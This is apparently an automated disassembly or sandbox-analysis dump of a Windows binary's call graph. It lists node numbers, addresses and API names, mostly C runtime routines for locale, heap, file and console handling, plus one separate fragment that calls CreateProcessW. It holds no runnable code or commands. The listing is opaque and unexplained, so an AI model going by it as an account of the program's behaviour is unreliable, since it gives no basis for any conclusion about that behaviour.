7fef9d2a028 16582->16583 16584 7fef9d2a234 16583->16584 16589 7fef9d2a039 __initmbctable 16583->16589 16590 7fef9d2a08e __initmbctable 16583->16590 16586 7fef9d2a25d IsValidCodePage 16584->16586 16584->16589 16585 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16587 7fef9d2a470 16585->16587 16588 7fef9d2a27b GetCPInfo 16586->16588 16586->16589 16587->16569 16588->16589 16592 7fef9d2a295 __initmbctable 16588->16592 16589->16585 16596 7fef9d2a5e0 GetCPInfo 16590->16596 16593 7fef9d2a5e0 __initmbctable 19 API calls 16592->16593 16593->16589 16594->16568 16595->16574 16600 7fef9d2a61f 16596->16600 16605 7fef9d2a7dc 16596->16605 16597 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16598 7fef9d2aa30 16597->16598 16598->16589 16599 7fef9d2f4d0 _CrtMemDumpAllObjectsSince_stat 3 API calls 16601 7fef9d2a734 16599->16601 16600->16599 16607 7fef9d2ef00 16601->16607 16603 7fef9d2a788 16604 7fef9d2ef00 __initmbctable 7 API calls 16603->16604 16604->16605 16605->16597 16606 7fef9d2a80a 16605->16606 16606->16589 16608 7fef9d2ef2c _CrtMemDumpAllObjectsSince 16607->16608 16611 7fef9d2efb0 16608->16611 16610 7fef9d2ef8e _LocaleUpdate::~_LocaleUpdate 16610->16603 16612 7fef9d2efd4 __initmbctable 16611->16612 16613 7fef9d2f068 MultiByteToWideChar 16612->16613 16614 7fef9d2f0a5 _CrtMemDumpAllObjectsSince_stat 16613->16614 16619 7fef9d2f0ac malloc _MarkAllocaS 16613->16619 16614->16610 16615 7fef9d2f122 MultiByteToWideChar 16615->16614 16616 7fef9d2f164 LCMapStringW 16615->16616 16616->16614 16617 7fef9d2f1a8 16616->16617 16618 7fef9d2f1b8 16617->16618 16625 7fef9d2f222 malloc _MarkAllocaS 16617->16625 16618->16614 16620 7fef9d2f1d9 LCMapStringW 16618->16620 16619->16614 16619->16615 16620->16614 16621 7fef9d2f2ac LCMapStringW 16621->16614 16622 7fef9d2f2ea 16621->16622 16623 7fef9d2f341 WideCharToMultiByte 16622->16623 16624 7fef9d2f2f4 WideCharToMultiByte 16622->16624 16623->16614 16624->16614 16625->16614 16625->16621 18462 7fef9d312e3 LoadLibraryW 18463 7fef9d31304 GetProcAddress 18462->18463 18464 7fef9d312fd 18462->18464 18463->18464 18465 7fef9d3132a 7 API calls 18463->18465 18468 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18464->18468 18466 7fef9d313b3 GetProcAddress EncodePointer 18465->18466 18467 7fef9d313d5 18465->18467 18466->18467 18470 7fef9d313f9 DecodePointer DecodePointer 18467->18470 18472 7fef9d31428 DecodePointer 18467->18472 18469 7fef9d3157a 18468->18469 18470->18472 18472->18464 18477 7fef9d344e5 18478 7fef9d3445a __SehTransFilter 18477->18478 18482 7fef9d3466c __SehTransFilter 18478->18482 18484 7fef9d35180 __SehTransFilter 38 API calls 18478->18484 18479 7fef9d347d7 18480 7fef9d3485b 18479->18480 18481 7fef9d2cf80 _inconsistency 36 API calls 18479->18481 18481->18480 18482->18479 18483 7fef9d35bb0 __SehTransFilter 36 API calls 18482->18483 18485 7fef9d34727 18483->18485 18484->18478 18485->18479 18486 7fef9d2e500 __GetUnwindTryBlock 37 API calls 18485->18486 18487 7fef9d34767 18486->18487 18488 7fef9d2edc0 __SehTransFilter 9 API calls 18487->18488 18488->18479 17501 7fef9d3bfde 17511 7fef9d3c00c 17501->17511 17502 7fef9d3b99c 17503 7fef9d3cc93 17502->17503 17508 7fef9d3bada 17502->17508 17505 7fef9d2bd70 _invalid_parameter 17 API calls 17503->17505 17506 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 17503->17506 17504 7fef9d3b530 wctomb_s 19 API calls 17504->17511 17505->17506 17507 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17506->17507 17509 7fef9d3cd90 17507->17509 17510 7fef9d2bd70 _invalid_parameter 17 API calls 17508->17510 17510->17506 17511->17502 17511->17504 17512 7fef9d35de0 17517 7fef9d23170 17512->17517 17514 7fef9d35e86 17518 7fef9d231ac 17517->17518 17519 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17518->17519 17520 7fef9d23263 17519->17520 17520->17514 17521 7fef9d23870 17520->17521 17522 7fef9d239db __SehTransFilter 17521->17522 17524 7fef9d238de __SehTransFilter 17521->17524 17522->17514 17523 7fef9d23a71 RtlUnwindEx 17523->17522 17524->17522 17524->17523 17525 7fef9d3ade0 17530 7fef9d3fee0 17525->17530 17528 7fef9d3adf9 17540 7fef9d3ff00 17530->17540 17532 7fef9d3ade9 17532->17528 17533 7fef9d3fc70 17532->17533 17539 7fef9d3fc86 17533->17539 17534 7fef9d3fd59 17607 7fef9d29360 LeaveCriticalSection 17534->17607 17536 7fef9d3fd63 17536->17528 17537 7fef9d3fd09 DeleteCriticalSection 17537->17539 17539->17534 17539->17537 17596 7fef9d40580 17539->17596 17541 7fef9d3ff22 17540->17541 17542 7fef9d40042 17541->17542 17543 7fef9d3ff47 17541->17543 17573 7fef9d29360 LeaveCriticalSection 17542->17573 17544 7fef9d4003d 17543->17544 17555 7fef9d3ae90 17543->17555 17544->17532 17546 7fef9d4004c 17546->17532 17548 7fef9d3ff97 17549 7fef9d3ffd0 17548->17549 17551 7fef9d3ffe1 17548->17551 17552 7fef9d3ffbb 17548->17552 17568 7fef9d3af60 17549->17568 17551->17549 17554 7fef9d3fd70 _fflush_nolock 25 API calls 17551->17554 17558 7fef9d3fd70 17552->17558 17554->17549 17556 7fef9d3aec8 EnterCriticalSection 17555->17556 17557 7fef9d3aea4 17555->17557 17556->17557 17557->17548 17559 7fef9d3fd81 17558->17559 17560 7fef9d3fd8a 17558->17560 17561 7fef9d3ff00 _fflush_nolock 25 API calls 17559->17561 17574 7fef9d3fdf0 17560->17574 17563 7fef9d3fd88 17561->17563 17563->17549 17564 7fef9d3fd94 17564->17563 17565 7fef9d3afb0 _fflush_nolock 17 API calls 17564->17565 17566 7fef9d3fdba 17565->17566 17578 7fef9d407c0 17566->17578 17569 7fef9d3af74 17568->17569 17570 7fef9d3af98 LeaveCriticalSection 17568->17570 17595 7fef9d29360 LeaveCriticalSection 17569->17595 17572 7fef9d3af96 17570->17572 17572->17544 17573->17546 17575 7fef9d3fe1f 17574->17575 17577 7fef9d3fe5d 17574->17577 17576 7fef9d3afb0 _fflush_nolock 17 API calls 17575->17576 17575->17577 17576->17577 17577->17564 17579 7fef9d407d3 17578->17579 17581 7fef9d407e8 17578->17581 17579->17563 17580 7fef9d40851 17582 7fef9d2bd70 _invalid_parameter 17 API calls 17580->17582 17581->17580 17587 7fef9d4088f 17581->17587 17582->17579 17583 7fef9d40913 17588 7fef9d2bd70 _invalid_parameter 17 API calls 17583->17588 17584 7fef9d40951 17585 7fef9d3fae0 _fflush_nolock 3 API calls 17584->17585 17586 7fef9d4095a 17585->17586 17589 7fef9d3f900 _fflush_nolock 17 API calls 17586->17589 17592 7fef9d409ab __doserrno 17586->17592 17587->17583 17587->17584 17588->17579 17590 7fef9d40992 FlushFileBuffers 17589->17590 17591 7fef9d4099f GetLastError 17590->17591 17590->17592 17591->17592 17594 7fef9d3fbc0 LeaveCriticalSection 17592->17594 17594->17579 17595->17572 17597 7fef9d40599 17596->17597 17598 7fef9d405ef 17597->17598 17599 7fef9d4062a 17597->17599 17601 7fef9d2bd70 _invalid_parameter 17 API calls 17598->17601 17603 7fef9d40623 17599->17603 17608 7fef9d3ae10 17599->17608 17601->17603 17602 7fef9d40651 17612 7fef9d40680 17602->17612 17603->17539 17605 7fef9d4065c 17623 7fef9d3aee0 17605->17623 17607->17536 17609 7fef9d3ae77 EnterCriticalSection 17608->17609 17610 7fef9d3ae27 17608->17610 17611 7fef9d3ae3b 17609->17611 17610->17609 17610->17611 17611->17602 17613 7fef9d40699 17612->17613 17614 7fef9d406ef 17613->17614 17615 7fef9d4072d 17613->17615 17619 7fef9d2bd70 _invalid_parameter 17 API calls 17614->17619 17616 7fef9d40723 17615->17616 17617 7fef9d3fdf0 _fflush_nolock 17 API calls 17615->17617 17616->17605 17618 7fef9d40752 17617->17618 17620 7fef9d3afb0 _fflush_nolock 17 API calls 17618->17620 17619->17616 17621 7fef9d4076a 17620->17621 17629 7fef9d40a20 17621->17629 17624 7fef9d3af47 LeaveCriticalSection 17623->17624 17625 7fef9d3aef7 17623->17625 17627 7fef9d3af45 17624->17627 17625->17624 17626 7fef9d3af0b 17625->17626 17665 7fef9d29360 LeaveCriticalSection 17626->17665 17627->17603 17630 7fef9d40a53 17629->17630 17636 7fef9d40a33 __doserrno 17629->17636 17631 7fef9d40abc __doserrno 17630->17631 17632 7fef9d40b05 17630->17632 17634 7fef9d2bd70 _invalid_parameter 17 API calls 17631->17634 17633 7fef9d40bd2 17632->17633 17638 7fef9d40b89 __doserrno 17632->17638 17635 7fef9d3fae0 _fflush_nolock 3 API calls 17633->17635 17634->17636 17637 7fef9d40bdb 17635->17637 17636->17616 17641 7fef9d40c13 17637->17641 17643 7fef9d40c80 17637->17643 17640 7fef9d2bd70 _invalid_parameter 17 API calls 17638->17640 17640->17636 17656 7fef9d3fbc0 LeaveCriticalSection 17641->17656 17644 7fef9d3f900 _fflush_nolock 17 API calls 17643->17644 17647 7fef9d40c91 17644->17647 17645 7fef9d40d05 17657 7fef9d3f7d0 17645->17657 17647->17645 17648 7fef9d3f900 _fflush_nolock 17 API calls 17647->17648 17655 7fef9d40ce5 17647->17655 17651 7fef9d40cd6 17648->17651 17649 7fef9d3f900 _fflush_nolock 17 API calls 17650 7fef9d40cf8 CloseHandle 17649->17650 17650->17645 17652 7fef9d40d0f GetLastError 17650->17652 17654 7fef9d3f900 _fflush_nolock 17 API calls 17651->17654 17652->17645 17653 7fef9d40d22 _dosmaperr 17653->17641 17654->17655 17655->17645 17655->17649 17656->17636 17658 7fef9d3f878 __doserrno 17657->17658 17659 7fef9d3f7e3 17657->17659 17658->17653 17659->17658 17660 7fef9d3f87a SetStdHandle 17659->17660 17661 7fef9d3f86a 17659->17661 17660->17658 17662 7fef9d3f871 17661->17662 17663 7fef9d3f889 SetStdHandle 17661->17663 17662->17658 17664 7fef9d3f898 SetStdHandle 17662->17664 17663->17658 17664->17658 17665->17627 18512 7fef9d348e0 18513 7fef9d348f7 std::bad_exception::~bad_exception 18512->18513 18514 7fef9d3490c 18513->18514 18515 7fef9d3d710 _Ref_count LeaveCriticalSection 18513->18515 18515->18514 18516 7fef9d27ae3 18519 7fef9d27af3 18516->18519 18517 7fef9d27ce0 SetHandleCount 18525 7fef9d27c74 18517->18525 18518 7fef9d27c7b 18518->18517 18519->18517 18519->18518 18520 7fef9d27b95 GetStdHandle 18519->18520 18520->18518 18521 7fef9d27bb9 18520->18521 18521->18518 18522 7fef9d27bc8 GetFileType 18521->18522 18522->18518 18524 7fef9d27beb InitializeCriticalSectionAndSpinCount 18522->18524 18524->18518 18524->18525 18526 7fef9d314e1 18527 7fef9d314ef DecodePointer 18526->18527 18528 7fef9d31520 DecodePointer 18526->18528 18527->18528 18529 7fef9d3150f 18527->18529 18530 7fef9d31540 18528->18530 18529->18528 18531 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18530->18531 18532 7fef9d3157a 18531->18532 17681 7fef9d2a7e9 17682 7fef9d2a7f9 17681->17682 17683 7fef9d2a80a 17682->17683 17684 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17682->17684 17685 7fef9d2aa30 17684->17685 17686 7fef9d2c7e9 17687 7fef9d2c80d 17686->17687 17688 7fef9d2c90c EncodePointer EncodePointer 17686->17688 17690 7fef9d2c872 17687->17690 17695 7fef9d24a00 17687->17695 17691 7fef9d2c8ca 17688->17691 17690->17691 17692 7fef9d24a00 _realloc_dbg 30 API calls 17690->17692 17693 7fef9d2c8ce EncodePointer 17690->17693 17694 7fef9d2c8bd 17692->17694 17693->17688 17694->17691 17694->17693 17696 7fef9d24a22 17695->17696 17701 7fef9d24a70 17696->17701 17698 7fef9d24a4c 17712 7fef9d29360 LeaveCriticalSection 17698->17712 17700 7fef9d24a5b 17700->17690 17703 7fef9d24ad4 _realloc_dbg 17701->17703 17711 7fef9d24aae _calloc_dbg_impl 17701->17711 17702 7fef9d26380 _CrtIsValidHeapPointer HeapValidate 17707 7fef9d24e2c 17702->17707 17703->17702 17703->17711 17704 7fef9d24f90 17728 7fef9d2ba60 17704->17728 17705 7fef9d24f64 17713 7fef9d2bc30 17705->17713 17707->17704 17707->17705 17707->17711 17709 7fef9d24fa6 17710 7fef9d24fba HeapSize 17709->17710 17709->17711 17710->17711 17711->17698 17712->17700 17714 7fef9d2bc50 17713->17714 17715 7fef9d2bc5f 17713->17715 17739 7fef9d2abf0 17714->17739 17717 7fef9d2bc67 17715->17717 17723 7fef9d2bc78 17715->17723 17719 7fef9d2c020 _free_base 2 API calls 17717->17719 17718 7fef9d2bcba 17721 7fef9d2abb0 _callnewh DecodePointer 17718->17721 17726 7fef9d2bc5a _get_errno_from_oserr 17719->17726 17720 7fef9d2bc9a HeapReAlloc 17720->17723 17721->17726 17722 7fef9d2bce4 17724 7fef9d2bcee GetLastError 17722->17724 17722->17726 17723->17718 17723->17720 17723->17722 17725 7fef9d2abb0 _callnewh DecodePointer 17723->17725 17727 7fef9d2bd1f GetLastError 17723->17727 17724->17726 17725->17723 17726->17711 17727->17726 17729 7fef9d2ba76 17728->17729 17730 7fef9d2bb07 17729->17730 17731 7fef9d2bacc 17729->17731 17732 7fef9d2bb32 HeapSize HeapReAlloc 17730->17732 17736 7fef9d2bb00 _get_errno_from_oserr 17730->17736 17734 7fef9d2bd70 _invalid_parameter 17 API calls 17731->17734 17733 7fef9d2bb74 17732->17733 17732->17736 17735 7fef9d2bba0 GetLastError 17733->17735 17745 7fef9d2bbd0 HeapQueryInformation 17733->17745 17734->17736 17735->17736 17736->17709 17740 7fef9d2ac4d 17739->17740 17742 7fef9d2ac0a 17739->17742 17741 7fef9d2abb0 _callnewh DecodePointer 17740->17741 17743 7fef9d2ac21 17741->17743 17742->17743 17744 7fef9d2abb0 _callnewh DecodePointer 17742->17744 17743->17726 17744->17742 17746 7fef9d2bb90 17745->17746 17746->17735 17746->17736 18537 7fef9d39aeb 18538 7fef9d39b2c 18537->18538 18539 7fef9d39b18 18537->18539 18541 7fef9d3ab10 17 API calls 18538->18541 18540 7fef9d39520 19 API calls 18539->18540 18540->18538 18542 7fef9d39b38 18541->18542 18543 7fef9d39c04 18542->18543 18550 7fef9d39bae GetConsoleMode 18542->18550 18544 7fef9d3a1cb 18543->18544 18547 7fef9d39c23 GetConsoleCP 18543->18547 18545 7fef9d3a205 18544->18545 18546 7fef9d3a8ad WriteFile 18544->18546 18548 7fef9d3a400 18545->18548 18551 7fef9d3a21a 18545->18551 18549 7fef9d3a923 GetLastError 18546->18549 18563 7fef9d39dd9 _dosmaperr __doserrno 18546->18563 18569 7fef9d39c4d 18547->18569 18552 7fef9d3a40e 18548->18552 18566 7fef9d3a5f3 18548->18566 18549->18563 18550->18543 18553 7fef9d3a33e WriteFile 18551->18553 18551->18563 18559 7fef9d3a531 WriteFile 18552->18559 18552->18563 18553->18551 18558 7fef9d3a3ea GetLastError 18553->18558 18554 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18557 7fef9d3a9f5 18554->18557 18555 7fef9d39f66 WideCharToMultiByte 18560 7fef9d39fbf WriteFile 18555->18560 18555->18563 18556 7fef9d3a726 WideCharToMultiByte 18561 7fef9d3a791 GetLastError 18556->18561 18556->18566 18558->18563 18559->18552 18562 7fef9d3a5dd GetLastError 18559->18562 18564 7fef9d3a050 GetLastError 18560->18564 18560->18569 18561->18563 18562->18563 18563->18554 18564->18563 18565 7fef9d3a7b0 WriteFile 18565->18566 18567 7fef9d3a857 GetLastError 18565->18567 18566->18556 18566->18563 18566->18565 18567->18566 18568 7fef9d3f330 MultiByteToWideChar MultiByteToWideChar wcsxfrm 18568->18569 18569->18555 18569->18563 18569->18568 18570 7fef9d3a158 GetLastError 18569->18570 18571 7fef9d3a06d WriteFile 18569->18571 18573 7fef9d3fc00 WriteConsoleW CreateFileW _putwch_nolock 18569->18573 18574 7fef9d3a1b5 GetLastError 18569->18574 18570->18563 18571->18569 18572 7fef9d3a103 GetLastError 18571->18572 18572->18563 18573->18569 18574->18563 16649 18000c85c 16650 18000c8c2 16649->16650 16651 1800178a8 CreateProcessW 16650->16651 16652 18000ca47 16651->16652 18598 7fef9d270e6 18599 7fef9d27090 _exit 33 API calls 18598->18599 18600 7fef9d270f0 18599->18600 17756 7fef9d291ea 17757 7fef9d291ef 17756->17757 17758 7fef9d274e0 __crtExitProcess 3 API calls 17757->17758 17759 7fef9d29203 17758->17759 17760 7fef9d375e9 17761 7fef9d375f4 17760->17761 17764 7fef9d375fb 17760->17764 17762 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17761->17762 17763 7fef9d37d85 17762->17763 17765 7fef9d2bd70 _invalid_parameter 17 API calls 17764->17765 17765->17761 18611 7fef9d2d0ea 18613 7fef9d2d0ef 18611->18613 18612 7fef9d2d0fc 18613->18612 18614 7fef9d27090 _exit 33 API calls 18613->18614 18615 7fef9d2d209 18613->18615 18614->18615 18617 7fef9d2d289 18615->18617 18619 7fef9d23d00 RtlEncodePointer 18615->18619 18617->18612 18620 7fef9d29360 LeaveCriticalSection 18617->18620 18619->18617 18620->18612 17770 7fef9d2c990 17774 7fef9d24980 17770->17774 17772 7fef9d2c9b8 EncodePointer 17773 7fef9d2c9e5 17772->17773 17775 7fef9d249cb _calloc_dbg_impl 17774->17775 17775->17772 17776 7fef9d35393 17777 7fef9d353a0 17776->17777 17778 7fef9d353b4 __SehTransFilter 17777->17778 17779 7fef9d353cc 17777->17779 17785 7fef9d354a0 RaiseException 17778->17785 17786 7fef9d354a0 RaiseException 17779->17786 17781 7fef9d353ca 17783 7fef9d2ed30 _FindAndUnlinkFrame 36 API calls 17781->17783 17784 7fef9d353e1 _IsExceptionObjectToBeDestroyed __SehTransFilter 17783->17784 17785->17781 17786->17781 18625 7fef9d34a95 18627 7fef9d34aad __SehTransFilter 18625->18627 18626 7fef9d34c2b 18627->18626 18628 7fef9d35180 __SehTransFilter 38 API calls 18627->18628 18628->18626 18629 7fef9d32695 18631 7fef9d326a0 18629->18631 18630 7fef9d326ab 18631->18630 18632 7fef9d2bd70 _invalid_parameter 17 API calls 18631->18632 18632->18630 16494 7fef9d24399 16495 7fef9d243a6 16494->16495 16497 7fef9d24377 16494->16497 16497->16494 16497->16495 16498 7fef9d2abb0 DecodePointer 16497->16498 16499 7fef9d2abd3 16498->16499 16499->16497 16500 7fef9d23599 16503 7fef9d28900 16500->16503 16502 7fef9d2359e 16504 7fef9d28920 16503->16504 16505 7fef9d28936 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 16503->16505 16504->16502 16506 7fef9d289de 16505->16506 16506->16504 18653 7fef9d2c080 HeapValidate 18654 7fef9d2c0a2 18653->18654 17809 7fef9d3b580 17810 7fef9d3b5fa 17809->17810 17811 7fef9d3b6cb 17810->17811 17812 7fef9d3b676 17810->17812 17813 7fef9d3afb0 _fflush_nolock 17 API calls 17811->17813 17814 7fef9d3b6fe 17811->17814 17815 7fef9d2bd70 _invalid_parameter 17 API calls 17812->17815 17813->17814 17816 7fef9d3b8a2 17814->17816 17817 7fef9d3b84d 17814->17817 17818 7fef9d3b6aa _LocaleUpdate::~_LocaleUpdate 17815->17818 17820 7fef9d3b915 17816->17820 17825 7fef9d3b96a 17816->17825 17819 7fef9d2bd70 _invalid_parameter 17 API calls 17817->17819 17821 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17818->17821 17819->17818 17823 7fef9d2bd70 _invalid_parameter 17 API calls 17820->17823 17822 7fef9d3cd90 17821->17822 17823->17818 17824 7fef9d3cc93 17824->17818 17826 7fef9d2bd70 _invalid_parameter 17 API calls 17824->17826 17825->17824 17827 7fef9d3bada 17825->17827 17826->17818 17828 7fef9d2bd70 _invalid_parameter 17 API calls 17827->17828 17828->17818 17842 7fef9d3df8d 17843 7fef9d3dfbb 17842->17843 17844 7fef9d3eadf 17843->17844 17845 7fef9d3eec0 25 API calls 17843->17845 17853 7fef9d3da75 17843->17853 17846 7fef9d3ef10 25 API calls 17844->17846 17845->17844 17847 7fef9d3eafd 17846->17847 17848 7fef9d3eb33 17847->17848 17850 7fef9d3eec0 25 API calls 17847->17850 17849 7fef9d3ec29 17848->17849 17860 7fef9d3eb49 _CrtMemDumpAllObjectsSince 17848->17860 17851 7fef9d3ebda 17849->17851 17852 7fef9d3ef10 25 API calls 17849->17852 17850->17848 17851->17853 17856 7fef9d3eec0 25 API calls 17851->17856 17852->17851 17854 7fef9d3eca1 17853->17854 17858 7fef9d3dbb5 17853->17858 17855 7fef9d2bd70 _invalid_parameter 17 API calls 17854->17855 17863 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 17854->17863 17855->17863 17856->17853 17857 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17859 7fef9d3ed9e 17857->17859 17862 7fef9d2bd70 _invalid_parameter 17 API calls 17858->17862 17860->17851 17861 7fef9d3f000 wcsxfrm 2 API calls 17860->17861 17864 7fef9d3ee40 25 API calls 17860->17864 17861->17860 17862->17863 17863->17857 17864->17860 18655 7fef9d210b0 18656 7fef9d210da 18655->18656 18657 7fef9d210fc 18656->18657 18658 7fef9d21000 4 API calls 18656->18658 18659 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18657->18659 18658->18657 18660 7fef9d2112c 18659->18660 17874 7fef9d39fba 17882 7fef9d39c4d 17874->17882 17875 7fef9d3a06d WriteFile 17876 7fef9d3a103 GetLastError 17875->17876 17875->17882 17881 7fef9d39dd9 _dosmaperr __doserrno 17876->17881 17877 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17879 7fef9d3a9f5 17877->17879 17878 7fef9d39f66 WideCharToMultiByte 17880 7fef9d39fbf WriteFile 17878->17880 17878->17881 17880->17882 17884 7fef9d3a050 GetLastError 17880->17884 17881->17877 17882->17875 17882->17878 17882->17881 17883 7fef9d3fc00 WriteConsoleW CreateFileW _putwch_nolock 17882->17883 17885 7fef9d3a158 GetLastError 17882->17885 17886 7fef9d3f330 MultiByteToWideChar MultiByteToWideChar wcsxfrm 17882->17886 17887 7fef9d3a1b5 GetLastError 17882->17887 17883->17882 17884->17881 17885->17881 17886->17882 17887->17881 18661 7fef9d3bcbd 18662 7fef9d3b99c 18661->18662 18663 7fef9d3cc93 18662->18663 18666 7fef9d3bada 18662->18666 18664 7fef9d2bd70 _invalid_parameter 17 API calls 18663->18664 18667 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 18663->18667 18664->18667 18665 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18668 7fef9d3cd90 18665->18668 18669 7fef9d2bd70 _invalid_parameter 17 API calls 18666->18669 18667->18665 18669->18667 18674 7fef9d3809f 18675 7fef9d38145 _calloc_dbg_impl 18674->18675 18676 7fef9d380b0 _calloc_dbg_impl 18674->18676 18675->18676 18677 7fef9d2bd70 _invalid_parameter 17 API calls 18675->18677 18677->18676 18678 7fef9d32c9f 18679 7fef9d32ca6 18678->18679 18681 7fef9d32caf 18678->18681 18680 7fef9d2bd70 _invalid_parameter 17 API calls 18679->18680 18679->18681 18680->18681 17903 7fef9d3a7a0 17909 7fef9d3a61f 17903->17909 17904 7fef9d3a726 WideCharToMultiByte 17905 7fef9d3a791 GetLastError 17904->17905 17904->17909 17911 7fef9d3a887 _dosmaperr __doserrno 17905->17911 17906 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17908 7fef9d3a9f5 17906->17908 17907 7fef9d3a7b0 WriteFile 17907->17909 17910 7fef9d3a857 GetLastError 17907->17910 17909->17904 17909->17907 17909->17911 17910->17909 17911->17906 16644 7fef9d2aca8 16645 7fef9d2acb2 16644->16645 16646 7fef9d274e0 __crtExitProcess 3 API calls 16645->16646 16647 7fef9d2acbc RtlAllocateHeap 16646->16647 18694 7fef9d25cad 18698 7fef9d25cb8 18694->18698 18695 7fef9d25e1a _realloc_dbg 18697 7fef9d26201 18698->18695 18699 7fef9d29360 LeaveCriticalSection 18698->18699 18699->18697 17924 7fef9d23faa 17925 7fef9d23e30 LeaveCriticalSection 17924->17925 17926 7fef9d23fb6 GetCurrentThreadId 17925->17926 17927 7fef9d23fea SetLastError 17926->17927 17928 7fef9d2cb4f 17929 7fef9d2cb5c 17928->17929 17932 7fef9d2cbeb GetStdHandle 17929->17932 17933 7fef9d2cc99 17929->17933 17956 7fef9d2cc94 17929->17956 17930 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17931 7fef9d2cf0f 17930->17931 17934 7fef9d2cc07 std::exception::_Copy_str 17932->17934 17932->17956 17935 7fef9d31640 17 API calls 17933->17935 17933->17956 17937 7fef9d2cc73 WriteFile 17934->17937 17934->17956 17936 7fef9d2cd10 17935->17936 17938 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17936->17938 17937->17956 17939 7fef9d2cd3d GetModuleFileNameW 17938->17939 17940 7fef9d2cd68 17939->17940 17945 7fef9d2cdb1 17939->17945 17941 7fef9d31640 17 API calls 17940->17941 17942 7fef9d2cd84 17941->17942 17943 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17942->17943 17943->17945 17944 7fef9d2ce5e 17946 7fef9d32d80 17 API calls 17944->17946 17945->17944 17957 7fef9d33380 17945->17957 17947 7fef9d2ce76 17946->17947 17948 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17947->17948 17950 7fef9d2cea3 17948->17950 17952 7fef9d32d80 17 API calls 17950->17952 17951 7fef9d2ce31 17953 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17951->17953 17954 7fef9d2ceb9 17952->17954 17953->17944 17955 7fef9d27ff0 _invoke_watson_if_error 16 API calls 17954->17955 17955->17956 17956->17930 17959 7fef9d333a6 17957->17959 17958 7fef9d3342f 17961 7fef9d2bd70 _invalid_parameter 17 API calls 17958->17961 17959->17958 17960 7fef9d3346d _calloc_dbg_impl 17959->17960 17963 7fef9d333bc _calloc_dbg_impl 17959->17963 17962 7fef9d335fb 17960->17962 17960->17963 17965 7fef9d33639 _calloc_dbg_impl 17960->17965 17961->17963 17964 7fef9d2bd70 _invalid_parameter 17 API calls 17962->17964 17963->17951 17964->17963 17965->17963 17966 7fef9d2bd70 _invalid_parameter 17 API calls 17965->17966 17966->17963 18713 7fef9d25854 18714 7fef9d2585b _calloc_dbg_impl 18713->18714 18715 7fef9d2c020 _free_base 2 API calls 18714->18715 18716 7fef9d259d5 18715->18716 17990 7fef9d40550 17991 7fef9d40575 17990->17991 17992 7fef9d4055e 17990->17992 17992->17991 17993 7fef9d40568 CloseHandle 17992->17993 17993->17991 17998 7fef9d3595c 17999 7fef9d2cf50 terminate 35 API calls 17998->17999 18000 7fef9d35961 17999->18000 18001 7fef9d25357 18004 7fef9d29360 LeaveCriticalSection 18001->18004 18003 7fef9d25361 18004->18003 18729 7fef9d2a057 18730 7fef9d2a061 18729->18730 18731 7fef9d2a234 18730->18731 18737 7fef9d2a08e __initmbctable 18730->18737 18732 7fef9d2a25d IsValidCodePage 18731->18732 18736 7fef9d2a22d __initmbctable 18731->18736 18734 7fef9d2a27b GetCPInfo 18732->18734 18732->18736 18733 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18735 7fef9d2a470 18733->18735 18734->18736 18739 7fef9d2a295 __initmbctable 18734->18739 18736->18733 18738 7fef9d2a5e0 __initmbctable 19 API calls 18737->18738 18738->18736 18740 7fef9d2a5e0 __initmbctable 19 API calls 18739->18740 18740->18736 18746 7fef9d2405b 18747 7fef9d2406e 18746->18747 18752 7fef9d29360 LeaveCriticalSection 18747->18752 18750 7fef9d24224 18751 7fef9d241bb _updatetlocinfoEx_nolock 18753 7fef9d29360 LeaveCriticalSection 18751->18753 18752->18751 18753->18750 18016 7fef9d2e55a 18017 7fef9d2e564 18016->18017 18018 7fef9d2e5c2 RtlLookupFunctionEntry 18017->18018 18019 7fef9d2e601 18017->18019 18018->18019 18754 7fef9d2425a FlsGetValue FlsSetValue 18755 7fef9d24283 18754->18755 16626 7fef9d27640 GetStartupInfoW 16635 7fef9d27676 _calloc_dbg 16626->16635 16627 7fef9d27689 16628 7fef9d27ce0 SetHandleCount 16628->16627 16629 7fef9d27ab9 16629->16628 16630 7fef9d27b95 GetStdHandle 16629->16630 16631 7fef9d27c7b 16629->16631 16630->16631 16632 7fef9d27bb9 16630->16632 16631->16628 16632->16631 16633 7fef9d27bc8 GetFileType 16632->16633 16633->16631 16634 7fef9d27beb InitializeCriticalSectionAndSpinCount 16633->16634 16634->16627 16634->16631 16635->16627 16635->16629 16637 7fef9d27a32 InitializeCriticalSectionAndSpinCount 16635->16637 16638 7fef9d27a19 GetFileType 16635->16638 16637->16627 16637->16629 16638->16629 16638->16637 18020 7fef9d21140 18021 7fef9d2116a 18020->18021 18022 7fef9d2118c 18021->18022 18023 7fef9d2119a FileTimeToSystemTime 18021->18023 18025 7fef9d23280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18022->18025 18023->18022 18024 7fef9d211ae 18023->18024 18028 7fef9d21000 GetThreadLocale GetDateFormatA 18024->18028 18027 7fef9d211d0 18025->18027 18029 7fef9d21062 GetThreadLocale GetTimeFormatA 18028->18029 18030 7fef9d2105b 18028->18030 18029->18030 18030->18022 18756 7fef9d28040 18757 7fef9d28056 18756->18757 